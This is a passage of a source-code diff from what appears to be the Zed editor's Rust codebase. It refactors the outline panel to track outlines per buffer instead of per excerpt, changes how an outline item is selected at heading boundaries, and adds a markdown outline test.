+ .or_insert_with(|| { + let outlines = match outline_panel.buffers.get(&buffer_id) { + Some(old_buffer) => match &old_buffer.outlines { + OutlineState::Outlines(outlines) => { + OutlineState::Outlines(outlines.clone()) + } + OutlineState::Invalidated(_) => OutlineState::NotFetched, + OutlineState::NotFetched => OutlineState::NotFetched, + }, + None => OutlineState::NotFetched, + }; + BufferOutlines { + outlines, + excerpts: Vec::new(), } - ExcerptOutlines::Invalidated(_) => ExcerptOutlines::NotFetched, - ExcerptOutlines::NotFetched => ExcerptOutlines::NotFetched, - }, - None => ExcerptOutlines::NotFetched, - }; - new_excerpts.entry(buffer_id).or_default().insert( - excerpt_id, - Excerpt { - range: excerpt_range, - outlines, - }, - ); + 
}) + .excerpts + .push(excerpt_range); buffer_excerpts }, ) @@ -2868,7 +2803,7 @@ impl OutlinePanel { BTreeMap::>::default(); let mut worktree_excerpts = HashMap::< WorktreeId, - HashMap)>, + HashMap>)>, >::default(); let mut external_excerpts = HashMap::default(); @@ -3146,7 +3081,7 @@ impl OutlinePanel { outline_panel .update_in(cx, |outline_panel, window, cx| { outline_panel.new_entries_for_fs_update.clear(); - outline_panel.excerpts = new_excerpts; + outline_panel.buffers = new_buffers; outline_panel.collapsed_entries = new_collapsed_entries; outline_panel.unfolded_dirs = new_unfolded_dirs; outline_panel.fs_entries = new_fs_entries; @@ -3156,7 +3091,7 @@ impl OutlinePanel { // Only update cached entries if we don't have outlines to fetch // If we do have outlines to fetch, let fetch_outdated_outlines handle the update - if outline_panel.excerpt_fetch_ranges(cx).is_empty() { + if outline_panel.buffers_to_fetch().is_empty() { outline_panel.update_cached_entries(debounce, window, cx); } @@ -3204,8 +3139,15 @@ impl OutlinePanel { item_handle: new_active_item.downgrade_item(), active_editor: new_active_editor.downgrade(), }); - self.new_entries_for_fs_update - .extend(new_active_editor.read(cx).buffer().read(cx).excerpt_ids()); + self.new_entries_for_fs_update.extend( + new_active_editor + .read(cx) + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id), + ); self.selected_entry.invalidate(); self.update_fs_entries(new_active_editor, None, window, cx); } @@ -3223,7 +3165,7 @@ impl OutlinePanel { self.fs_entries.clear(); self.fs_entries_depth.clear(); self.fs_children_count.clear(); - self.excerpts.clear(); + self.buffers.clear(); self.cached_entries = Vec::new(); self.selected_entry = SelectedEntry::None; self.pinned = false; @@ -3237,23 +3179,14 @@ impl OutlinePanel { window: &mut Window, cx: &mut Context, ) -> Option { - let selection = editor.update(cx, |editor, cx| { - editor - .selections - 
.newest::(&editor.display_snapshot(cx)) - .head() - }); let editor_snapshot = editor.update(cx, |editor, cx| editor.snapshot(window, cx)); let multi_buffer = editor.read(cx).buffer(); let multi_buffer_snapshot = multi_buffer.read(cx).snapshot(cx); - let (excerpt_id, buffer, _) = editor - .read(cx) - .buffer() - .read(cx) - .excerpt_containing(selection, cx)?; - let buffer_id = buffer.read(cx).remote_id(); + let anchor = editor.update(cx, |editor, _| editor.selections.newest_anchor().head()); + let selection_display_point = anchor.to_display_point(&editor_snapshot); + let (anchor, _) = multi_buffer_snapshot.anchor_to_buffer_anchor(anchor)?; - if editor.read(cx).is_buffer_folded(buffer_id, cx) { + if editor.read(cx).is_buffer_folded(anchor.buffer_id, cx) { return self .fs_entries .iter() @@ -3266,14 +3199,12 @@ impl OutlinePanel { | FsEntry::ExternalFile(FsEntryExternalFile { buffer_id: other_buffer_id, .. - }) => buffer_id == *other_buffer_id, + }) => anchor.buffer_id == *other_buffer_id, }) .cloned() .map(PanelEntry::Fs); } - let selection_display_point = selection.to_display_point(&editor_snapshot); - match &self.mode { ItemsDisplayMode::Search(search_state) => search_state .matches @@ -3310,32 +3241,31 @@ impl OutlinePanel { }) }), ItemsDisplayMode::Outline => self.outline_location( - buffer_id, - excerpt_id, + anchor, multi_buffer_snapshot, editor_snapshot, selection_display_point, + cx, ), } } fn outline_location( &self, - buffer_id: BufferId, - excerpt_id: ExcerptId, + selection_anchor: Anchor, multi_buffer_snapshot: editor::MultiBufferSnapshot, editor_snapshot: editor::EditorSnapshot, selection_display_point: DisplayPoint, + cx: &App, ) -> Option { let excerpt_outlines = self - .excerpts - .get(&buffer_id) - .and_then(|excerpts| excerpts.get(&excerpt_id)) + .buffers + .get(&selection_anchor.buffer_id) .into_iter() - .flat_map(|excerpt| excerpt.iter_outlines()) + .flat_map(|buffer| buffer.iter_outlines()) .flat_map(|outline| { let range = multi_buffer_snapshot 
- .anchor_range_in_excerpt(excerpt_id, outline.range.clone())?; + .buffer_anchor_range_to_anchor_range(outline.range.clone())?; Some(( range.start.to_display_point(&editor_snapshot) ..range.end.to_display_point(&editor_snapshot), @@ -3407,25 +3337,32 @@ impl OutlinePanel { selection_display_point - outline_range.end }; + // An outline item's range can extend to the same row the next + // item starts on, so when the cursor is at the start of that + // row, prefer the item that starts there over any item whose + // range merely overlaps that row. + let cursor_not_at_outline_start = outline_range.start != selection_display_point; ( + cursor_not_at_outline_start, cmp::Reverse(outline.depth), - distance_from_start + distance_from_end, + distance_from_start, + distance_from_end, ) }) .map(|(_, (_, outline))| *outline) .cloned(); let closest_container = match outline_item { - Some(outline) => PanelEntry::Outline(OutlineEntry::Outline(OutlineEntryOutline { - buffer_id, - excerpt_id, - outline, - })), + Some(outline) => PanelEntry::Outline(OutlineEntry::Outline(outline)), None => { self.cached_entries.iter().rev().find_map(|cached_entry| { match &cached_entry.entry { PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { - if excerpt.buffer_id == buffer_id && excerpt.id == excerpt_id { + if excerpt.context.start.buffer_id == selection_anchor.buffer_id + && let Some(buffer_snapshot) = + self.buffer_snapshot_for_id(excerpt.context.start.buffer_id, cx) + && excerpt.contains(&selection_anchor, &buffer_snapshot) + { Some(cached_entry.entry.clone()) } else { None @@ -3435,6 +3372,7 @@ impl OutlinePanel { FsEntry::ExternalFile(FsEntryExternalFile { buffer_id: file_buffer_id, excerpts: file_excerpts, + .. }) | FsEntry::File(FsEntryFile { buffer_id: file_buffer_id, @@ -3442,7 +3380,13 @@ impl OutlinePanel { .. 
}), ) => { - if file_buffer_id == &buffer_id && file_excerpts.contains(&excerpt_id) { + if *file_buffer_id == selection_anchor.buffer_id + && let Some(buffer_snapshot) = + self.buffer_snapshot_for_id(*file_buffer_id, cx) + && file_excerpts.iter().any(|excerpt| { + excerpt.contains(&selection_anchor, &buffer_snapshot) + }) + { Some(cached_entry.entry.clone()) } else { None @@ -3457,18 +3401,17 @@ impl OutlinePanel { } fn fetch_outdated_outlines(&mut self, window: &mut Window, cx: &mut Context) { - let excerpt_fetch_ranges = self.excerpt_fetch_ranges(cx); - if excerpt_fetch_ranges.is_empty() { + let buffers_to_fetch = self.buffers_to_fetch(); + if buffers_to_fetch.is_empty() { return; } let first_update = Arc::new(AtomicBool::new(true)); - for (buffer_id, (_buffer_snapshot, excerpt_ranges)) in excerpt_fetch_ranges { + for buffer_id in buffers_to_fetch { let outline_task = self.active_editor().map(|editor| { editor.update(cx, |editor, cx| editor.buffer_outline_items(buffer_id, cx)) }); - let excerpt_ids = excerpt_ranges.keys().copied().collect::>(); let first_update = first_update.clone(); self.outline_fetch_tasks.insert( @@ -3503,40 +3446,26 @@ impl OutlinePanel { Some(UPDATE_DEBOUNCE) }; - for excerpt_id in &excerpt_ids { - if let Some(excerpt) = outline_panel - .excerpts - .entry(buffer_id) - .or_default() - .get_mut(excerpt_id) + if let Some(buffer) = outline_panel.buffers.get_mut(&buffer_id) { + buffer.outlines = OutlineState::Outlines(fetched_outlines.clone()); + + if let Some(default_depth) = pending_default_depth + && let OutlineState::Outlines(outlines) = &buffer.outlines { - excerpt.outlines = - ExcerptOutlines::Outlines(fetched_outlines.clone()); - - if let Some(default_depth) = pending_default_depth - && let ExcerptOutlines::Outlines(outlines) = - &excerpt.outlines - { - outlines - .iter() - .filter(|outline| { - (default_depth == 0 - || outline.depth >= default_depth) - && outlines_with_children.contains(&( - outline.range.clone(), - outline.depth, - )) - 
}) - .for_each(|outline| { - outline_panel.collapsed_entries.insert( - CollapsedEntry::Outline( - buffer_id, - *excerpt_id, - outline.range.clone(), - ), - ); - }); - } + outlines + .iter() + .filter(|outline| { + (default_depth == 0 || outline.depth >= default_depth) + && outlines_with_children.contains(&( + outline.range.clone(), + outline.depth, + )) + }) + .for_each(|outline| { + outline_panel.collapsed_entries.insert( + CollapsedEntry::Outline(outline.range.clone()), + ); + }); } } @@ -3553,73 +3482,35 @@ impl OutlinePanel { .is_some_and(|active_editor| active_editor.read(cx).buffer().read(cx).is_singleton()) } - fn invalidate_outlines(&mut self, ids: &[ExcerptId]) { + fn invalidate_outlines(&mut self, ids: &[BufferId]) { self.outline_fetch_tasks.clear(); let mut ids = ids.iter().collect::>(); - for excerpts in self.excerpts.values_mut() { - ids.retain(|id| { - if let Some(excerpt) = excerpts.get_mut(id) { - excerpt.invalidate_outlines(); - false - } else { - true - } - }); + for (buffer_id, buffer) in self.buffers.iter_mut() { + if ids.remove(&buffer_id) { + buffer.invalidate_outlines(); + } if ids.is_empty() { break; } } } - fn excerpt_fetch_ranges( - &self, - cx: &App, - ) -> HashMap< - BufferId, - ( - BufferSnapshot, - HashMap>, - ), - > { + fn buffers_to_fetch(&self) -> HashSet { self.fs_entries .iter() - .fold(HashMap::default(), |mut excerpts_to_fetch, fs_entry| { + .fold(HashSet::default(), |mut buffers_to_fetch, fs_entry| { match fs_entry { - FsEntry::File(FsEntryFile { - buffer_id, - excerpts: file_excerpts, - .. 
- }) - | FsEntry::ExternalFile(FsEntryExternalFile { - buffer_id, - excerpts: file_excerpts, - }) => { - let excerpts = self.excerpts.get(buffer_id); - for &file_excerpt in file_excerpts { - if let Some(excerpt) = excerpts - .and_then(|excerpts| excerpts.get(&file_excerpt)) - .filter(|excerpt| excerpt.should_fetch_outlines()) - { - match excerpts_to_fetch.entry(*buffer_id) { - hash_map::Entry::Occupied(mut o) => { - o.get_mut().1.insert(file_excerpt, excerpt.range.clone()); - } - hash_map::Entry::Vacant(v) => { - if let Some(buffer_snapshot) = - self.buffer_snapshot_for_id(*buffer_id, cx) - { - v.insert((buffer_snapshot, HashMap::default())) - .1 - .insert(file_excerpt, excerpt.range.clone()); - } - } - } - } + FsEntry::File(FsEntryFile { buffer_id, .. }) + | FsEntry::ExternalFile(FsEntryExternalFile { buffer_id, .. }) => { + if let Some(buffer) = self.buffers.get(buffer_id) + && buffer.should_fetch_outlines() + { + buffers_to_fetch.insert(*buffer_id); } } FsEntry::Directory(..) => {} } - excerpts_to_fetch + buffers_to_fetch }) } @@ -4017,13 +3908,12 @@ impl OutlinePanel { } else { None }; - if let Some((buffer_id, entry_excerpts)) = excerpts_to_consider + if let Some((buffer_id, _entry_excerpts)) = excerpts_to_consider && !active_editor.read(cx).is_buffer_folded(buffer_id, cx) { - outline_panel.add_excerpt_entries( + outline_panel.add_buffer_entries( &mut generation_state, buffer_id, - entry_excerpts, depth, track_matches, is_singleton, @@ -4171,7 +4061,7 @@ impl OutlinePanel { } PanelEntry::Outline(OutlineEntry::Outline(outline_entry)) => state .match_candidates - .push(StringMatchCandidate::new(id, &outline_entry.outline.text)), + .push(StringMatchCandidate::new(id, &outline_entry.text)), PanelEntry::Outline(OutlineEntry::Excerpt(_)) => {} PanelEntry::Search(new_search_entry) => { if let Some(search_data) = new_search_entry.render_data.get() { @@ -4338,131 +4228,118 @@ impl OutlinePanel { update_cached_entries } - fn add_excerpt_entries( + fn add_buffer_entries( 
&mut self, state: &mut GenerationState, buffer_id: BufferId, - entries_to_add: &[ExcerptId], parent_depth: usize, track_matches: bool, is_singleton: bool, query: Option<&str>, cx: &mut Context, ) { - if let Some(excerpts) = self.excerpts.get(&buffer_id) { - let buffer_snapshot = self.buffer_snapshot_for_id(buffer_id, cx); + let Some(buffer) = self.buffers.get(&buffer_id) else { + return; + }; - for &excerpt_id in entries_to_add { - let Some(excerpt) = excerpts.get(&excerpt_id) else { - continue; - }; - let excerpt_depth = parent_depth + 1; - self.push_entry( - state, - track_matches, - PanelEntry::Outline(OutlineEntry::Excerpt(OutlineEntryExcerpt { - buffer_id, - id: excerpt_id, - range: excerpt.range.clone(), - })), - excerpt_depth, - cx, - ); + let buffer_snapshot = self.buffer_snapshot_for_id(buffer_id, cx); - let mut outline_base_depth = excerpt_depth + 1; - if is_singleton { - outline_base_depth = 0; - state.clear(); - } else if query.is_none() - && self - .collapsed_entries - .contains(&CollapsedEntry::Excerpt(buffer_id, excerpt_id)) - { - continue; - } + for excerpt in &buffer.excerpts { + let excerpt_depth = parent_depth + 1; + self.push_entry( + state, + track_matches, + PanelEntry::Outline(OutlineEntry::Excerpt(excerpt.clone())), + excerpt_depth, + cx, + ); - let mut last_depth_at_level: Vec>> = vec![None; 10]; + let mut outline_base_depth = excerpt_depth + 1; + if is_singleton { + outline_base_depth = 0; + state.clear(); + } else if query.is_none() + && self + .collapsed_entries + .contains(&CollapsedEntry::Excerpt(excerpt.clone())) + { + continue; + } - let all_outlines: Vec<_> = excerpt.iter_outlines().collect(); + let mut last_depth_at_level: Vec>> = vec![None; 10]; - let mut outline_has_children = HashMap::default(); - let mut visible_outlines = Vec::new(); - let mut collapsed_state: Option<(usize, Range)> = None; + let all_outlines: Vec<_> = buffer.iter_outlines().collect(); - for (i, &outline) in all_outlines.iter().enumerate() { - let has_children 
= all_outlines - .get(i + 1) - .map(|next| next.depth > outline.depth) - .unwrap_or(false); + let mut outline_has_children = HashMap::default(); + let mut visible_outlines = Vec::new(); + let mut collapsed_state: Option<(usize, Range)> = None; - outline_has_children - .insert((outline.range.clone(), outline.depth), has_children); + for (i, &outline) in all_outlines.iter().enumerate() { + let has_children = all_outlines + .get(i + 1) + .map(|next| next.depth > outline.depth) + .unwrap_or(false); - let mut should_include = true; + outline_has_children.insert((outline.range.clone(), outline.depth), has_children); - if let Some((collapsed_depth, collapsed_range)) = &collapsed_state { - if outline.depth <= *collapsed_depth { + let mut should_include = true; + + if let Some((collapsed_depth, collapsed_range)) = &collapsed_state { + if outline.depth <= *collapsed_depth { + collapsed_state = None; + } else if let Some(buffer_snapshot) = buffer_snapshot.as_ref() { + let outline_start = outline.range.start; + if outline_start + .cmp(&collapsed_range.start, buffer_snapshot) + .is_ge() + && outline_start + .cmp(&collapsed_range.end, buffer_snapshot) + .is_lt() + { + should_include = false; // Skip - inside collapsed range + } else { collapsed_state = None; - } else if let Some(buffer_snapshot) = buffer_snapshot.as_ref() { - let outline_start = outline.range.start; - if outline_start - .cmp(&collapsed_range.start, buffer_snapshot) - .is_ge() - && outline_start - .cmp(&collapsed_range.end, buffer_snapshot) - .is_lt() - { - should_include = false; // Skip - inside collapsed range - } else { - collapsed_state = None; - } } } + } - // Check if this outline itself is collapsed - if should_include - && self.collapsed_entries.contains(&CollapsedEntry::Outline( - buffer_id, - excerpt_id, - outline.range.clone(), - )) - { - collapsed_state = Some((outline.depth, outline.range.clone())); - } + // Check if this outline itself is collapsed + if should_include + && self + .collapsed_entries 
+ .contains(&CollapsedEntry::Outline(outline.range.clone())) + { + collapsed_state = Some((outline.depth, outline.range.clone())); + } - if should_include { - visible_outlines.push(outline); - } + if should_include { + visible_outlines.push(outline); } + } - self.outline_children_cache - .entry(buffer_id) - .or_default() - .extend(outline_has_children); + self.outline_children_cache + .entry(buffer_id) + .or_default() + .extend(outline_has_children); - for outline in visible_outlines { - let outline_entry = OutlineEntryOutline { - buffer_id, - excerpt_id, - outline: outline.clone(), - }; + for outline in visible_outlines { + let outline_entry = outline.clone(); - if outline.depth < last_depth_at_level.len() { - last_depth_at_level[outline.depth] = Some(outline.range.clone()); - // Clear deeper levels when we go back to a shallower depth - for d in (outline.depth + 1)..last_depth_at_level.len() { - last_depth_at_level[d] = None; - } + if outline.depth < last_depth_at_level.len() { + last_depth_at_level[outline.depth] = Some(outline.range.clone()); + // Clear deeper levels when we go back to a shallower depth + for d in (outline.depth + 1)..last_depth_at_level.len() { + last_depth_at_level[d] = None; } - - self.push_entry( - state, - track_matches, - PanelEntry::Outline(OutlineEntry::Outline(outline_entry)), - outline_base_depth + outline.depth, - cx, - ); } + + self.push_entry( + state, + track_matches, + PanelEntry::Outline(OutlineEntry::Outline(outline_entry)), + outline_base_depth + outline.depth, + cx, + ); } } } @@ -4488,32 +4365,37 @@ impl OutlinePanel { FsEntry::File(file) => &file.excerpts, } .iter() - .copied() + .cloned() .collect::>(); let depth = if is_singleton { 0 } else { parent_depth + 1 }; - let new_search_matches = search_state - .matches - .iter() - .filter(|(match_range, _)| { - related_excerpts.contains(&match_range.start.excerpt_id) - || related_excerpts.contains(&match_range.end.excerpt_id) - }) - .filter(|(match_range, _)| { - let editor = 
active_editor.read(cx); - let snapshot = editor.buffer().read(cx).snapshot(cx); - if let Some(buffer_id) = snapshot.buffer_id_for_anchor(match_range.start) - && editor.is_buffer_folded(buffer_id, cx) - { + let new_search_matches = search_state.matches.iter().filter(|(match_range, _)| { + let editor = active_editor.read(cx); + let snapshot = editor.buffer().read(cx).snapshot(cx); + if !related_excerpts.iter().any(|excerpt| { + let (Some(start), Some(end)) = ( + snapshot.anchor_in_buffer(excerpt.context.start), + snapshot.anchor_in_buffer(excerpt.context.end), + ) else { return false; - } - if let Some(buffer_id) = snapshot.buffer_id_for_anchor(match_range.end) - && editor.is_buffer_folded(buffer_id, cx) - { - return false; - } - true - }); + }; + let excerpt_range = start..end; + excerpt_range.overlaps(match_range, &snapshot) + }) { + return false; + }; + if let Some((buffer_anchor, _)) = snapshot.anchor_to_buffer_anchor(match_range.start) + && editor.is_buffer_folded(buffer_anchor.buffer_id, cx) + { + return false; + } + if let Some((buffer_anchor, _)) = snapshot.anchor_to_buffer_anchor(match_range.end) + && editor.is_buffer_folded(buffer_anchor.buffer_id, cx) + { + return false; + } + true + }); let new_search_entries = new_search_matches .map(|(match_range, search_data)| SearchEntry { @@ -4631,10 +4513,10 @@ impl OutlinePanel { + folded_dirs.entries.len().saturating_sub(1) * "/".len() } PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => self - .excerpt_label(excerpt.buffer_id, &excerpt.range, cx) + .excerpt_label(&excerpt, cx) .map(|label| label.len()) .unwrap_or_default(), - PanelEntry::Outline(OutlineEntry::Outline(entry)) => entry.outline.text.len(), + PanelEntry::Outline(OutlineEntry::Outline(entry)) => entry.text.len(), PanelEntry::Search(search) => search .render_data .get() @@ -4812,7 +4694,7 @@ impl OutlinePanel { .size_full() .child(list_contents.size_full().flex_shrink()) .custom_scrollbars( - Scrollbars::for_settings::() + 
Scrollbars::for_settings::() .tracked_scroll_handle(&self.scroll_handle.clone()) .with_track_along( ScrollAxes::Horizontal, @@ -5004,17 +4886,8 @@ impl Panel for OutlinePanel { }); } - fn size(&self, _: &Window, cx: &App) -> Pixels { - self.width - .unwrap_or_else(|| OutlinePanelSettings::get_global(cx).default_width) - } - - fn set_size(&mut self, size: Option, window: &mut Window, cx: &mut Context) { - self.width = size; - cx.notify(); - cx.defer_in(window, |this, _, cx| { - this.serialize(cx); - }); + fn default_size(&self, _: &Window, cx: &App) -> Pixels { + OutlinePanelSettings::get_global(cx).default_width } fn icon(&self, _: &Window, cx: &App) -> Option { @@ -5073,7 +4946,7 @@ impl Panel for OutlinePanel { } fn activation_priority(&self) -> u32 { - 5 + 6 } } @@ -5226,31 +5099,21 @@ fn subscribe_for_editor_events( outline_panel.reveal_entry_for_selection(editor.clone(), window, cx); cx.notify(); } - EditorEvent::ExcerptsAdded { excerpts, .. } => { + EditorEvent::BuffersRemoved { removed_buffer_ids } => { outline_panel - .new_entries_for_fs_update - .extend(excerpts.iter().map(|&(excerpt_id, _)| excerpt_id)); + .buffers + .retain(|buffer_id, _| !removed_buffer_ids.contains(buffer_id)); outline_panel.update_fs_entries(editor.clone(), debounce, window, cx); } - EditorEvent::ExcerptsRemoved { ids, .. } => { - let mut ids = ids.iter().collect::>(); - for excerpts in outline_panel.excerpts.values_mut() { - excerpts.retain(|excerpt_id, _| !ids.remove(excerpt_id)); - if ids.is_empty() { - break; - } - } + EditorEvent::BufferRangesUpdated { buffer, .. 
} => { + outline_panel + .new_entries_for_fs_update + .insert(buffer.read(cx).remote_id()); + outline_panel.invalidate_outlines(&[buffer.read(cx).remote_id()]); outline_panel.update_fs_entries(editor.clone(), debounce, window, cx); } - EditorEvent::ExcerptsExpanded { ids } => { - outline_panel.invalidate_outlines(ids); - let update_cached_items = outline_panel.update_non_fs_items(window, cx); - if update_cached_items { - outline_panel.update_cached_entries(Some(UPDATE_DEBOUNCE), window, cx); - } - } - EditorEvent::ExcerptsEdited { ids } => { - outline_panel.invalidate_outlines(ids); + EditorEvent::BuffersEdited { buffer_ids } => { + outline_panel.invalidate_outlines(buffer_ids); let update_cached_items = outline_panel.update_non_fs_items(window, cx); if update_cached_items { outline_panel.update_cached_entries(Some(UPDATE_DEBOUNCE), window, cx); @@ -5264,29 +5127,20 @@ fn subscribe_for_editor_events( outline_panel.new_entries_for_fs_update.extend( ids.iter() .filter(|id| { - outline_panel - .excerpts - .iter() - .find_map(|(buffer_id, excerpts)| { - if excerpts.contains_key(id) { - ignore_selections_change |= outline_panel - .preserve_selection_on_buffer_fold_toggles - .remove(buffer_id); - Some(buffer_id) - } else { - None - } - }) - .map(|buffer_id| { - if editor.read(cx).is_buffer_folded(*buffer_id, cx) { - latest_folded_buffer_id = Some(*buffer_id); - false - } else { - latest_unfolded_buffer_id = Some(*buffer_id); - true - } - }) - .unwrap_or(true) + if outline_panel.buffers.contains_key(&id) { + ignore_selections_change |= outline_panel + .preserve_selection_on_buffer_fold_toggles + .remove(&id); + if editor.read(cx).is_buffer_folded(**id, cx) { + latest_folded_buffer_id = Some(**id); + false + } else { + latest_unfolded_buffer_id = Some(**id); + true + } + } else { + false + } }) .copied(), ); @@ -5322,10 +5176,8 @@ fn subscribe_for_editor_events( outline_panel.update_fs_entries(editor.clone(), debounce, window, cx); } EditorEvent::Reparsed(buffer_id) => { - 
if let Some(excerpts) = outline_panel.excerpts.get_mut(buffer_id) { - for excerpt in excerpts.values_mut() { - excerpt.invalidate_outlines(); - } + if let Some(buffer) = outline_panel.buffers.get_mut(buffer_id) { + buffer.invalidate_outlines(); } let update_cached_items = outline_panel.update_non_fs_items(window, cx); if update_cached_items { @@ -5333,10 +5185,8 @@ fn subscribe_for_editor_events( } } EditorEvent::OutlineSymbolsChanged => { - for excerpts in outline_panel.excerpts.values_mut() { - for excerpt in excerpts.values_mut() { - excerpt.invalidate_outlines(); - } + for buffer in outline_panel.buffers.values_mut() { + buffer.invalidate_outlines(); } if matches!( outline_panel.selected_entry(), @@ -5384,7 +5234,7 @@ impl GenerationState { mod tests { use db::indoc; use gpui::{TestAppContext, UpdateGlobal, VisualTestContext, WindowHandle}; - use language::{self, FakeLspAdapter, rust_lang}; + use language::{self, FakeLspAdapter, markdown_lang, rust_lang}; use pretty_assertions::assert_eq; use project::FakeFs; use search::{ @@ -6889,7 +6739,7 @@ outline: struct OutlineEntryExcerpt PanelEntry::Outline(outline_entry) => match outline_entry { OutlineEntry::Excerpt(_) => continue, OutlineEntry::Outline(outline_entry) => { - format!("outline: {}", outline_entry.outline.text) + format!("outline: {}", outline_entry.text) } }, PanelEntry::Search(search_entry) => { @@ -6923,7 +6773,7 @@ outline: struct OutlineEntryExcerpt let settings = SettingsStore::test(cx); cx.set_global(settings); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); project_search::init(cx); @@ -7257,10 +7107,9 @@ outline: fn main" PanelEntry::Outline(OutlineEntry::Outline(outline)) if panel .outline_children_cache - .get(&outline.buffer_id) + .get(&outline.range.start.buffer_id) .and_then(|children_map| { - let key = - (outline.outline.range.clone(), outline.outline.depth); + let key = (outline.range.clone(), outline.depth); 
children_map.get(&key) }) .copied() @@ -7347,9 +7196,9 @@ outline: fn main" PanelEntry::Outline(OutlineEntry::Outline(outline)) if panel .outline_children_cache - .get(&outline.buffer_id) + .get(&outline.range.start.buffer_id) .and_then(|children_map| { - let key = (outline.outline.range.clone(), outline.outline.depth); + let key = (outline.range.clone(), outline.depth); children_map.get(&key) }) .copied() @@ -7725,10 +7574,9 @@ outline: fn main" PanelEntry::Outline(OutlineEntry::Outline(outline)) if panel .outline_children_cache - .get(&outline.buffer_id) + .get(&outline.range.start.buffer_id) .and_then(|children_map| { - let key = - (outline.outline.range.clone(), outline.outline.depth); + let key = (outline.range.clone(), outline.depth); children_map.get(&key) }) .copied() @@ -8112,4 +7960,110 @@ outline: struct Foo <==== selected ); }); } + + #[gpui::test] + async fn test_markdown_outline_selection_at_heading_boundaries(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + "/test", + json!({ + "doc.md": indoc!(" + # Section A + + ## Sub Section A + + ## Sub Section B + + # Section B + + ") + }), + ) + .await; + + let project = Project::test(fs.clone(), [Path::new("/test")], cx).await; + project.read_with(cx, |project, _| project.languages().add(markdown_lang())); + let (window, workspace) = add_outline_panel(&project, cx).await; + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let outline_panel = outline_panel(&workspace, cx); + outline_panel.update_in(cx, |outline_panel, window, cx| { + outline_panel.set_active(true, window, cx) + }); + + let editor = workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_abs_path( + PathBuf::from("/test/doc.md"), + OpenOptions { + visible: Some(OpenVisible::All), + ..Default::default() + }, + window, + cx, + ) + }) + .await + .unwrap() + .downcast::() + .unwrap(); + + cx.run_until_parked(); + + outline_panel.update_in(cx, 
|panel, window, cx| { + panel.update_non_fs_items(window, cx); + panel.update_cached_entries(Some(UPDATE_DEBOUNCE), window, cx); + }); + + // Helper function to move the cursor to the first column of a given row + // and return the selected outline entry's text. + let move_cursor_and_get_selection = + |row: u32, cx: &mut VisualTestContext| -> Option { + cx.update(|window, cx| { + editor.update(cx, |editor, cx| { + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_ranges(Some( + language::Point::new(row, 0)..language::Point::new(row, 0), + )) + }); + }); + }); + + cx.run_until_parked(); + + outline_panel.read_with(cx, |panel, _cx| { + panel.selected_entry().and_then(|entry| match entry { + PanelEntry::Outline(OutlineEntry::Outline(outline)) => { + Some(outline.text.clone()) + } + _ => None, + }) + }) + }; + + assert_eq!( + move_cursor_and_get_selection(0, cx).as_deref(), + Some("# Section A"), + "Cursor at row 0 should select '# Section A'" + ); + + assert_eq!( + move_cursor_and_get_selection(2, cx).as_deref(), + Some("## Sub Section A"), + "Cursor at row 2 should select '## Sub Section A'" + ); + + assert_eq!( + move_cursor_and_get_selection(4, cx).as_deref(), + Some("## Sub Section B"), + "Cursor at row 4 should select '## Sub Section B'" + ); + + assert_eq!( + move_cursor_and_get_selection(6, cx).as_deref(), + Some("# Section B"), + "Cursor at row 6 should select '# Section B'" + ); + } } diff --git a/crates/outline_panel/src/outline_panel_settings.rs b/crates/outline_panel/src/outline_panel_settings.rs index b744ca6399dd16ad216d1cb4c6dda5e1d93baa4b..18f52e512da24ee986e9fe3f49ff5e3cd08c8b23 100644 --- a/crates/outline_panel/src/outline_panel_settings.rs +++ b/crates/outline_panel/src/outline_panel_settings.rs @@ -1,4 +1,4 @@ -use editor::EditorSettings; +use editor::{EditorSettings, ui_scrollbar_settings_from_raw}; use gpui::{App, Pixels}; use settings::RegisterSetting; pub use settings::{DockSide, Settings, ShowIndentGuides}; 
@@ -33,9 +33,13 @@ pub struct IndentGuidesSettings { pub show: ShowIndentGuides, } -impl ScrollbarVisibility for OutlinePanelSettings { +#[derive(Default)] +pub(crate) struct OutlinePanelSettingsScrollbarProxy; + +impl ScrollbarVisibility for OutlinePanelSettingsScrollbarProxy { fn visibility(&self, cx: &App) -> ShowScrollbar { - self.scrollbar + OutlinePanelSettings::get_global(cx) + .scrollbar .show .unwrap_or_else(|| EditorSettings::get_global(cx).scrollbar.show) } @@ -65,7 +69,11 @@ impl Settings for OutlinePanelSettings { auto_reveal_entries: panel.auto_reveal_entries.unwrap(), auto_fold_dirs: panel.auto_fold_dirs.unwrap(), scrollbar: ScrollbarSettings { - show: panel.scrollbar.unwrap().show.map(Into::into), + show: panel + .scrollbar + .unwrap() + .show + .map(ui_scrollbar_settings_from_raw), }, expand_outlines_with_depth: panel.expand_outlines_with_depth.unwrap(), } diff --git a/crates/panel/src/panel.rs b/crates/panel/src/panel.rs index 133efa9cb61c122af79a228cdfb74f86e22792b4..cf6465f3f5973bf24429f010dadf369346123b8f 100644 --- a/crates/panel/src/panel.rs +++ b/crates/panel/src/panel.rs @@ -52,7 +52,6 @@ pub fn panel_button(label: impl Into) -> ui::Button { let id = ElementId::Name(label.to_lowercase().replace(' ', "_").into()); ui::Button::new(id, label) .label_size(ui::LabelSize::Small) - .icon_size(ui::IconSize::Small) // TODO: Change this once we use on_surface_bg in button_like .layer(ui::ElevationIndex::ModalSurface) .size(ui::ButtonSize::Compact) diff --git a/crates/paths/src/paths.rs b/crates/paths/src/paths.rs index 656188e249fc864e1328c8f458bdc46aa7eaea3a..c9b9c756217281d587491aac5cac81e7cd0baaf2 100644 --- a/crates/paths/src/paths.rs +++ b/crates/paths/src/paths.rs @@ -310,30 +310,6 @@ pub fn snippets_dir() -> &'static PathBuf { SNIPPETS_DIR.get_or_init(|| config_dir().join("snippets")) } -// Returns old path to contexts directory. 
